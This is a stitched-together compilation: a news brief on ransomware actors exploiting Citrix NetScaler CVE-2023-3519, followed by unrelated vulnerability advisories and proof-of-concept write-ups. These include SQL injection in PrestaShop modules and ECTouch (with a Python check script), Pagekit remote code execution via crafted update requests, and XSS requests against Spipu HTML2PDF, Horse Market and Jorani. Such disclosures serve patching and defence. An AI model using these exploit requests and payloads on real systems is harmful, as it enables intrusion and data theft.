Unpatched Citrix NetScaler systems exposed to the internet are being targeted by unknown threat actors in what's suspected to be a ransomware attack.
Cybersecurity company Sophos is tracking the activity cluster under the moniker STAC4663.
Attack chains involve the exploitation of CVE-2023-3519, a critical code injection vulnerability impacting NetScaler ADC and Gateway servers that could

Vulnerability / Network Security

Unpatched Citrix NetScaler systems exposed to the internet are being targeted by unknown threat actors in what's suspected to be a ransomware attack.

Cybersecurity company Sophos is tracking the activity cluster under the moniker **STAC4663**.

Attack chains involve the exploitation of CVE-2023-3519, a critical code injection vulnerability impacting NetScaler ADC and Gateway servers that could facilitate unauthenticated remote code execution.

In one intrusion detected in mid-August 2023, the security flaw is said to have been used to conduct a domain-wide attack, including injecting payloads into legitimate executables such as the Windows Update Agent (wuauclt.exe) and the Windows Management Instrumentation Provider Service (wmiprvse.exe). An analysis of the payload is underway.

Other notable aspects include the distribution of obfuscated PowerShell scripts, PHP web shells, and the use of an Estonian service called BlueVPS for malware staging.

Sophos said the modus operandi aligns "closely" with that of an attack campaign that NCC Group Fox-IT disclosed earlier this month in which nearly 2,000 Citrix NetScaler systems were breached.

The attacks are also said to be linked to an earlier incident that used the same techniques minus the Citrix vulnerability. Indicators of compromise (IoCs) associated with the campaign can be accessed here.

"All this leads us to say it's probable that this is activity from a known threat actor specializing in ransomware attacks," the company said in a series of posts on X.

Users of Citrix NetScaler ADC and Gateway appliances are highly recommended to apply the patches to mitigate potential threats.

The development comes as ransomware is on track to scale new highs in 2023, as threat actors are rapidly escalating their attacks by harnessing security flaws in widely used software to breach target environments.

This has been accompanied by a surge in cybercrime groups spawning new ransomware strains (e.g., DoDo, Proton, and Trash Panda) as well as moving more quickly to compromise companies once they have gained initial access, an indication that the attackers are getting better at honing their process of stealing and encrypting data.

While most ransomware gangs continue to pursue double or triple extortion schemes, some groups have been observed pivoting from encryption to a simpler theft-and-extortion strategy, which is referred to as an encryptionless extortion attack.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Citrix NetScaler Alert: Ransomware Hackers Exploiting Critical Vulnerability

An issue in Pagekit pagekit v.1.0.18 alows a remote attacker to execute arbitrary code via thedownloadAction and updateAction functions in UpdateController.php

**Command injection in pagekit**

High severity GitHub Reviewed Published Aug 29, 2023 to the GitHub Advisory Database • Updated Aug 30, 2023

GHSA-j6mp-hx4g-p3gm: Command injection in pagekit

Theme Volty CMS Blog up to version v4.0.1 was discovered to contain a SQL injection vulnerability via the id parameter at /tvcmsblog/single.

In the module “Theme Volty CMS Blog” (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.

**Summary**

*   **CVE ID**: CVE-2023-39650
*   **Published at**: 2023-08-24
*   **Platform**: PrestaShop
*   **Product**: tvcmsblog
*   **Impacted release**: <= 4.0.1 (4.0.2 fixed the vulnerability)
*   **Product author**: Theme Volty
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

The method TvcmsBlogSingleModuleFrontController::run() have a sensitive SQL call that can be executed with a trivial HTTP call and exploited to forge a SQL injection.

If your server do not manage correctly these HTTP headers (which will be the case for all servers not managed by a professional system administrator), you are concerned:

*   CLIENT\_IP
*   X\_FORWARDED\_FOR
*   X\_FORWARDED
*   FORWARDED\_FOR
*   FORWARDED

See recommendations if needed about this.

This exploit uses a PrestaShop front controller and most attackers can conceal the module controller’s path during the exploit, so you will never know within your conventional frontend logs that it exploits this vulnerability. **You will only see “POST /” inside your conventional frontend logs.** Activating the AuditEngine of mod\_security (or similar) is the only way to get data to confirm this exploit.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data from the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to expose tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijack emails

**Patch from 4.0.1**

    --- 4.0.1/tvcmsblog/controllers/front/single.php
    +++ 4.0.2/tvcmsblog/controllers/front/single.php
    ...
        public function initContent()
        {
            $ipaddress = '';
            if (isset($_SERVER['HTTP_CLIENT_IP'])) {
                $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
            } elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
                $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
            } elseif (isset($_SERVER['HTTP_X_FORWARDED'])) {
                $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
            } elseif (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
                $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
            } elseif (isset($_SERVER['HTTP_FORWARDED'])) {
                $ipaddress = $_SERVER['HTTP_FORWARDED'];
            } elseif (isset($_SERVER['REMOTE_ADDR'])) {
                $ipaddress = $_SERVER['REMOTE_ADDR'];
            } else {
                $ipaddress = 'UNKNOWN';
            }
            $blogid = $this->blogpost['id_tvcmsposts'];
    
    -       $select_data = 'SELECT MAX(id_view) as max_id FROM `' . _DB_PREFIX_ . 'tvcmsposts_view` where `id_tvcmsposts` = ' . $blogid . ' AND `ipadress` = \'' . $ipaddress . '\' ';
    +       $select_data = 'SELECT MAX(id_view) as max_id FROM `' . _DB_PREFIX_ . 'tvcmsposts_view` where `id_tvcmsposts` = ' . (int) $blogid . ' AND `ipadress` = \'' . pSQL($ipaddress) . '\' ';
            $ans = Db::getInstance()->executeS($select_data);
    
            if (1 > $ans[0]['max_id']) {
                $dataquery = 'INSERT INTO `' . _DB_PREFIX_ . 'tvcmsposts_view`
                                    SET 
    -                                   `id_tvcmsposts` = ' . $blogid . ',
    +                                   `id_tvcmsposts` = ' . (int) $blogid . ',
    -                                    ipadress = \'' . $ipaddress . '\'';
    +                                    ipadress = \'' . pSQL($ipaddress) . '\'';
    

**Other recommendations**

*   It’s recommended to upgrade to the latest version of the module **tvcmsblog**.
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   These HTTP headers are not supposed to be used on a final application, since they should be used only if REMOTE_ADDR is allowed with modules like mod\_remoteip for Apache2, so you should auto-delete them if you are not behind a well setup load-balancer or reverse proxy.
*   Change the default database prefix ps_ with a new longer, arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skills because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against this set of rules.

**Timeline**

Date

Action

2023-02-10

Issue discovered during a code review by TouchWeb.fr

2023-02-10

Contact PrestaShop Addons security Team to confirm versions scope by author

2023-02-15

The author provided a patch, but it still contains all critical vulnerabilities.

2023-04-13

Recontact PrestaShop Addons security Team to confirm versions scope by author

2023-04-13

Request a CVE ID

2023-05-19

Author provide patch

2023-08-15

Received CVE ID

2023-08-24

Publish this security advisory

**Links**

*   PrestaShop addons product page
*   Author product page
*   National Vulnerability Database

CVE-2023-39650: [CVE-2023-39650] Improper neutralization of SQL parameters in Theme Volty CMS Blog module for PrestaShop

**Problem**

**There is a logical flaw that leads to obtaining shell access.**

**Technical Details**

*   Pagekit version: 1.0.18
*   Webserver: nginx
*   Database: mysql
*   PHP Version: 7.4

Vulnerability Path:  
app/installer/src/Controller/UpdateController.php  
Lines 32-72: downloadAction and updateAction functions  
The downloadAction function retrieves a file from a remote location to the local system.  
The updateAction function reads the downloaded file.  
Within it, the SelfUpdater function is called at app/installer/src/SelfUpdater.php.  
It includes the app/installer/requirements.php file from the remotely fetched file.  
This can lead to remote code execution.  
Based on this, constructing a zip file as follows:  
pagekit.zip

The data package is as follows

    POST /index.php/admin/system/update/download HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: keep-alive
    Content-Length: 58
    Content-Type: application/x-www-form-urlencoded
    Cookie: Administrator's Cookie
    Host: localhost
    Referer: http://localhost/index.php/admin/system/update/download
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    
    url=constructed_zip_file&_csrf=4eb8d50f82ebae5b1fa16d5177d99ea7d740a8b2
    

    POST /index.php/admin/system/update/update HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cache-Control: max-age=0
    Connection: keep-alive
    Content-Length: 46
    Content-Type: application/x-www-form-urlencoded
    Cookie: Administrator's Cookie
    Host: localhost
    Referer: http://localhost /index.php/admin/system/update/update
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    
    _csrf=4eb8d50f82ebae5b1fa16d5177d99ea7d740a8b2

CVE-2023-41005: There is a logical flaw that leads to obtaining shell access. · Issue #977 · pagekit/pagekit

theme volty tvcmsvideotab up to v4.0.0 was discovered to contain a SQL injection vulnerability via the component TvcmsVideoTabConfirmDeleteModuleFrontController::run().

In the module “Theme Volty Video Tab” (tvcmsvideotab) up to version 4.0.0 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.

**Summary**

*   **CVE ID**: CVE-2023-39652
*   **Published at**: 2023-08-24
*   **Platform**: PrestaShop
*   **Product**: tvcmsvideotab
*   **Impacted release**: <= 4.0.0 (4.0.1 fixed the vulnerability)
*   **Product author**: Theme Volty
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

The methods TvcmsVideoTabConfirmDeleteModuleFrontController::run() and TvcmsVideoTabSaveVideoModuleFrontController::run() has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.

This exploit uses a PrestaShop front controller and most attackers can conceal the module controller’s path during the exploit, so you will never know within your conventional frontend logs that it exploits this vulnerability. **You will only see “POST /” inside your conventional frontend logs.** Activating the AuditEngine of mod\_security (or similar) is the only way to get data to confirm this exploit.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data from the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to expose tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijack emails

**Patch from 4.0.0**

    --- 4.0.0/tvcmsvideotab/controllers/front/confirmdelete.php
    +++ 4.0.1/tvcmsvideotab/controllers/front/confirmdelete.php
    class TvcmsVideoTabConfirmDeleteModuleFrontController extends ModuleFrontController
    {
        /**
         * @see FrontController::postProcess()
         */
        public function run()
        {
            $db = Db::getInstance(_PS_USE_SQL_SLAVE_);
        -   $id_product = Tools::getValue('id');
        +   $id_product = (int) Tools::getValue('id');
        -   $id_lang = Tools::getValue('id_lang');
        +   $id_lang = (int) Tools::getValue('id_lang');
            $id_shop = $this->context->shop->id;
        }
    }
    

    --- 4.0.0/tvcmsvideotab/controllers/front/savevideo.php
    +++ XXXXX/tvcmsvideotab/controllers/front/savevideo.php
    class TvcmsVideoTabSaveVideoModuleFrontController extends ModuleFrontController
    {
        public function run()
        {
            $ok = '';
            $id_lang_default = Configuration::get('PS_LANG_DEFAULT');
            $ob_lang_default = new Language($id_lang_default);
            $name_lang_default = $ob_lang_default->name;
    -       $id_shop = Tools::getValue('id_shop');
    +       $id_shop = (int) Tools::getValue('id_shop');
    -       $name_shop = Tools::getValue('name_shop');
    +       $name_shop = pSQL(Tools::getValue('name_shop'));
            $db = Db::getInstance(_PS_USE_SQL_SLAVE_);
            $url = $_SERVER['SCRIPT_FILENAME'];
            $url = rtrim($url, 'index.php');
            $languages = Language::getLanguages();
    -       $type_video = Tools::getValue('type_video');
    +       $type_video = pSQL(Tools::getValue('type_video'));
    -       $id_product = Tools::getValue('id_product');
    +       $id_product = (int) Tools::getValue('id_product');
    ...
                            $sql = 'REPLACE INTO ' . _DB_PREFIX_ . 'url_video ';
                            $sql .= '(id_video,id_product,id_store,text_url,language,shop,name_product,type,id_lang)';
                            $sql .= " VALUES ('" . $id_video . "','" . $id_product . "','" . $id_shop . "','";
    -                       $sql .= '' . trim($name_url_array[$value_lang['id_lang']]) . "','" . $value_lang['name'] . "','";
    +                       $sql .= '' . pSQL(trim($name_url_array[$value_lang['id_lang']])) . "','" . $value_lang['name'] . "','";
    ...
                            $sql = 'REPLACE INTO ' . _DB_PREFIX_ . 'url_video ';
                            $sql .= '(id_video,id_product,id_store,text_url,language,shop,name_product,type,id_lang)';
                            $sql .= " VALUES ('" . $id_video . "','" . $id_product . "','" . $id_shop . "','";
    -                       $sql .= '' . trim($name_url_array[$value_lang['id_lang']]) . "','" . $value_lang['name'] . "','";
    +                       $sql .= '' . pSQL(trim($name_url_array[$value_lang['id_lang']])) . "','" . $value_lang['name'] . "','";
    ...
                            $sql = 'REPLACE INTO ' . _DB_PREFIX_ . 'url_video ';
                            $sql .= '(id_video,id_product,id_store,text_url,language,shop,name_product,type,id_lang)';
                            $sql .= " VALUES ('" . $id_video . "','" . $id_product . "','" . $id_shop . "','";
    -                       $sql .= '' . trim($name_url_array[$value_lang['id_lang']]) . "','" . $value_lang['name'] . "','";
    +                       $sql .= '' . pSQL(trim($name_url_array[$value_lang['id_lang']])) . "','" . $value_lang['name'] . "','";
    

**Other recommendations**

*   It’s recommended to upgrade to the latest version of the module **tvcmsvideotab**.
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   Change the default database prefix ps_ with a new longer, arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skills because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against this set of rules.

**Timeline**

Date

Action

2023-02-10

Issue discovered during a code review by TouchWeb.fr

2023-02-10

Contact PrestaShop Addons security Team to confirm versions scope by author

2023-02-15

Author provide a patch which still own all criticals vulnerabilities

2023-04-13

Recontact PrestaShop Addons security Team to confirm versions scope by author

2023-04-13

Request a CVE ID

2023-05-19

Author provide patch

2023-08-15

Received CVE ID

2023-08-24

Publish this security advisory

**Links**

*   PrestaShop addons product page
*   Author product page
*   National Vulnerability Database

CVE-2023-39652: [CVE-2023-39652] Improper neutralization of SQL parameter in Theme Volty Video Tab module for PrestaShop

Cross Site Scripting vulnerability in Spipu HTML2PDF before v.5.2.8 allows a remote attacker to execute arbitrary code via a crafted script to the forms.php.

**Spipu HTML2PDF vulnerable to cross-site scripting**

Moderate severity GitHub Reviewed Published Aug 28, 2023 to the GitHub Advisory Database • Updated Aug 29, 2023

GHSA-99fg-2h75-m92h: Spipu HTML2PDF vulnerable to cross-site scripting 

**CVE-2023-39062**

Spipu Html2Pdf < 5.2.8 - XSS vulnerabilities in example files.

**Timeline**

*   Vulnerability reported to vendor: 18.07.2023
*   New fixed 5.2.8 version released: 18.07.2023
*   Public disclosure: 23.08.2023

**Description**

Cross-Site-Scripting (XSS) vulnerability in Spipu Html2Pdf example files. This vulnerability allows an attacker to execute untrusted JavaScript code in the context of the currently logged-in user.

The vulnerability exists in any parameter that is passed to the example9.php and forms.php example files.

Example request to forms.php script:

    GET /html2pdf/examples/res/forms.php?test=abc"><script>alert(document.domain)</script> HTTP/1.1
    Host: example.afine.com
    Cookie: PHPSESSID=oiqo2oopiqt88teqgfb0a23vk0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0
    Accept-Language: pl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close
    

Server response:

    HTTP/1.1 200 OK
    Server: Apache
    Content-Length: 2215
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    [...]
    
    <page footer="form">
        <h1>Test de formulaire</h1><br>
        <br>
        <form action="http://example.afine.com:443/html2pdf/examples/res/forms.php?test=abc"><script>alert(document.domain)</script>">
            <input type="hidden" name="test" value="1">
    
    [...]
    

Example request to example9.php script:

    GET /html2pdf/examples/exemple09.php?test=/"><script>alert(document.domain)</script>abc/?nom=1 HTTP/1.1
    Host: example.afine.com
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: pl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close
    

Server response:

    HTTP/1.1 200 OK
    Date: Sat, 08 Jul 2023 18:32:51 GMT
    Server: Apache
    X-Powered-By: PHP/7.4.8
    Content-Length: 795
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    [...]
    
    <body>
    <br>
    Ceci est un exemple de génération de PDF via un bouton :)<br>
    <br>
    <img src="http://example.afine.com/html2pdf/examples/exemple09.php?test=/"><script>alert(document.domain)</script>abc/res/exemple09.png.php?px=5&amp;py=20" alt="image_php" ><br>
    <br>
    <br>
            <form method="get" action="">
    
    [...]
    

This issue was caused by a lack of sanitization of the provided request parameters. This problem has been fixed in Spipu Html2Pdf version 5.2.8.

**Affected versions**

< 5.2.8

**Advisory**

Update Spipu Html2Pdf to 5.2.8 or newer.

**References**

*   https://github.com/spipu/html2pdf/blob/92afd81823d62ad95eb9d034858311bb63aeb4ac/CHANGELOG.md
*   https://nvd.nist.gov/vuln/detail/CVE-2023-39062

CVE-2023-39062: GitHub - afine-com/CVE-2023-39062: Spipu Html2Pdf < 5.2.8 - XSS vulnerabilities in example files

ECTouch v2 was discovered to contain a SQL injection vulnerability via the $arr['id'] parameter at \default\helpers\insert.php.

#SQL Injection Vulnerability in ECTouch v2

###Vulnerability Position

In the insert\_bought\_notes function on line 285 in the \\ectouch-main\\include\\apps\\default\\helpers\\insert.php file, the incoming $arr\['id'\] parameter is not verified, resulting in a sql injection vulnerability.

###POC

Use python to write scripts for vulnerability verification.

#!/usr/bin/python
\# -\*- coding: utf-8 -\*-
\# @Author : qyg
\# @File : sqli check for ECTouch v2
\# @function : Detect for SQL injection vulnerabilities in ECTouch.

import requests,re

#your target
target \= 'http://127.0.0.1/'

payload \= '/index.php?m=default&c=user&a=register&u=0'

url \= target + payload

headers \= {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.54',
    'Referer': '554fcae493e564ee0dc75bdf2ebf94cabought\_notes|a:1:{s:2:"id";s:49:"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#";}'
}

response \= requests.get(url, headers\=headers)

print(response.text)

match \= re.search('XPATH syntax error: \\'~(.\*)~\\'',response.text)

if match:
    print("There is SQL injection vulnerability, and you are currently using the following database:" + match.group(1))

Running results:

CVE-2023-39560: GitHub - Luci4n555/cve_ectouch: detail

Horse Market Sell and Rent Portal Script version 1.5.7 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Horse Market Sell & Rent Portal Script V1.5.7 xss via file uploads Vulnerability                                   || # Author    : indoushka                                                                                                          || # Telegram  : @indoushka                                                                                                         || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : https://codecanyon.net/item/horse-market-sell-rent-portal/14174352?s_rank=1725                                     |  | # Dork      : "InfinityMarket MultiPurpose Script is a multi-solution product made with simplicity in mind so you can benefit "  |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  singup your user & go to /index.php/frontend/myprofile/en#content[+]  choose your file svg and upload it .[+]  http://localhost/files/index.svgGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Horse Market Sell And Rent Portal Script 1.5.7 Cross Site Scripting 

Jorani version 1.0.3 suffers from a cross site scripting vulnerability.

    ## Title: Jorani-v1.0.3-©2014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure## Author: nu11secur1ty## Date: 08/27/2023## Vendor: https://jorani.org/## Software: https://demo.jorani.org/session/login## Reference: https://portswigger.net/web-security/cross-site-scripting## Reference: https://portswigger.net/web-security/information-disclosure## Description:The value of the `language request` parameter is copied into aJavaScript string which is encapsulated in double quotation marks. Thepayload 75943";alert(1)//569 was submitted in the language parameter.This input was echoed unmodified in the application's response.The attacker can modify the token session and he can discoversensitive information for the server.STATUS: HIGH-Vulnerability[+]Exploit:```POSTPOST /session/login HTTP/1.1Host: demo.jorani.orgAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36Connection: closeCache-Control: max-age=0Cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2;jorani_session=fbc630d2510ffdd2a981ccfe97301b1b90ab47dc#ATTACKOrigin: http://demo.jorani.orgUpgrade-Insecure-Requests: 1Referer: http://demo.jorani.org/session/loginContent-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 183csrf_test_jorani=9b4b02ece59e0f321cd0324a633b5dd2&last_page=session%2Flogin&language=en-GBarh5l%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ennois&login=bbalet&CipheredValue=```[+]Response:```HTTPHTTP/1.1 200 OKdate: Sun, 27 Aug 2023 06:03:04 GMTcontent-type: text/html; charset=UTF-8Content-Length: 681server: Apachex-powered-by: PHP/8.2expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheset-cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2;expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/;SameSite=Strictset-cookie: jorani_session=9ae823ffa74d722c809f6bda69954593483f2cfd;expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; HttpOnly;SameSite=Laxlast-modified: Sun, 27 Aug 2023 06:03:04 GMTvary: Accept-Encodingcache-control: private, no-cache, no-store, proxy-revalidate,no-transform, must-revalidatepragma: no-cachex-iplb-request-id: 3E497A1D:118A_D5BA2118:0050_64EAE718_12C0:1FBA1x-iplb-instance: 27474connection: close<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"><h4>A PHP Error was encountered</h4><p>Severity: 8192</p><p>Message:  strlen(): Passing null to parameter #1 ($string) of typestring is deprecated</p><p>Filename: controllers/Connection.php</p><p>Line Number: 126</p></div><div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"><h4>A PHP Error was encountered</h4><p>Severity: Warning</p><p>Message:  Cannot modify header information - headers already sentby (output started at/home/decouvric/demo.jorani.org/system/core/Exceptions.php:272)</p><p>Filename: helpers/url_helper.php</p><p>Line Number: 565</p></div>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Jorani/2023/Jorani-v1.0.3-%C2%A92014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/jorani-v103-2014-2023-benjamin-balet.html)## Time spend:01:35:00

Tag

#php